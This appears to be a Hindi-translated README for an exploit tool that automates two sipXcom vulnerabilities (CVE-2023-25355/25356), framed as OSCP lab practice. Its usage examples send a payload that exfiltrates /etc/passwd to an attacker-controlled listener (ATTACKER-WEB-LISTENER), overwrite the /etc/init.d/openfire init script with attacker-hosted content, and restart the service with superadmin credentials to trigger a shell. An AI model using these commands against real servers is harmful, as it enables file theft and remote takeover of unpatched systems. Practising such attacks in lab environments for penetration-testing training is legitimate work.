
CVE-2023-25355 और CVE-2023-25356 स्वचालित सेवा पुनः लोड के साथ
यह शोषण [email protected] द्वारा पाया गया था और इसे दो अद्भुत टुकड़ों में प्रस्तुत किया गया है:
इस भेद्यता को और अधिक स्वचालित करने के लिए एक रिपॉजिटरी एलेक्स लिनोव द्वारा प्रकाशित की गई है:
CVE-2023-25355 एक एक्सफिल्ट्रेशन तंत्र है जहां sipXcom सर्वर पर फ़ाइलें हमलावर द्वारा नियंत्रित एक वेबसर्वर पर अपलोड की जाती हैं।
CVE-2023-25356 पहली भेद्यता का एक विस्तार है जहां हमलावर द्वारा नियंत्रित फ़ाइलों को sipXcom सर्वर फ़ाइलसिस्टम पर लिखा जा सकता है। चूंकि sipXcom सेवा अपने स्वयं के init कॉन्फ़िगरेशन को अधिलेखित करने में सक्षम है, इसलिए सेवा के पुनरारंभ होते ही आसानी से एक शेल प्राप्त किया जा सकता है।
यहाँ ध्यान देने योग्य दिलचस्प बात यह है कि sipXcom superadmin उपयोगकर्ता इस सेवा को पुनरारंभ करने में सक्षम है। इसलिए इस पैकेज का उद्देश्य इस सेवा के पुनरारंभ को पूरी तरह से स्वचालित करना है।
OSCP की तैयारी के लिए, ऐसी लैब्स हैं जिनमें मशीनों को हैक करना होता है।
एक विशिष्ट लैब में, इस भेद्यता के अधीन एक मशीन काफी अस्थिर थी/है, जिसका अर्थ है कि आपको कभी-कभी लैब को कई बार शुरू और वापस करना पड़ता था। यह कष्टप्रद है। एक बार स्वचालित होने पर, यह कम कष्टप्रद होता है।
आपको चाहिए:
poetry install
फिर आप या तो सक्रिय वातावरण से टूल चला सकते हैं, इसे निर्देशिका से या कहीं और CVE के नाम के साथ चला सकते हैं:
# if the poetry environment is active (poetry shell)
cve_2023_25355 --help
# otherwise, from the current directory
poetry run cve_2023_25355 --help
# otherwise from another directory
poetry -C /shared/tools/CVE/CVE-2023-25355 run cve_2023_25355 --help
निम्नलिखित उदाहरण में, हम /etc/passwd फ़ाइल को एक्सफ़िल्ट्रेट करने के लिए एक पेलोड भेजते हैं जो एक नियंत्रित HTTP लिसनर पर अपलोड किया जाएगा।
cve_2023_25355 \
--xmpp-username my_username --xmpp-password my_password --xmpp-target-username friend_username \
--xmpp-server-address 1.2.3.4 \
--payload '--data-binary @/etc/passwd http://ATTACKER-WEB-LISTENER/some_path'
निम्नलिखित उदाहरण में, हम प्रदान किए गए URI की सामग्री के साथ /etc/init.d/openfire को अधिलेखित करने के लिए एक पेलोड भेजते हैं।
cve_2023_25356 \
--xmpp-username my_username --xmpp-password my_password --xmpp-target-username friend_username \
--xmpp-server-address 1.2.3.4 \
--sipxcom-init-file-source-uri 'http://ATTACKER-WEB-LISTENER/my-offensive-sipx-config'
फिर, यदि हम superadmin पासवर्ड जानते हैं, तो हम कॉन्फ़िग को पुनः लोड करने और किसी भी गैजेट को ट्रिगर करने के लिए सेवा को पुनरारंभ कर सकते हैं।
run sipxcom_service_restart \
--sipxcom-superuser-username superadmin \
--sipxcom-superuser-password superadmin_password \
--sipxcom-website https://1.2.3.4/
--debug-local-directory /tmp
./proxychains4 -f proxychains.conf cve_2023_25355 [...] --xmpp-server-address 172.1.2.3
परियोजना: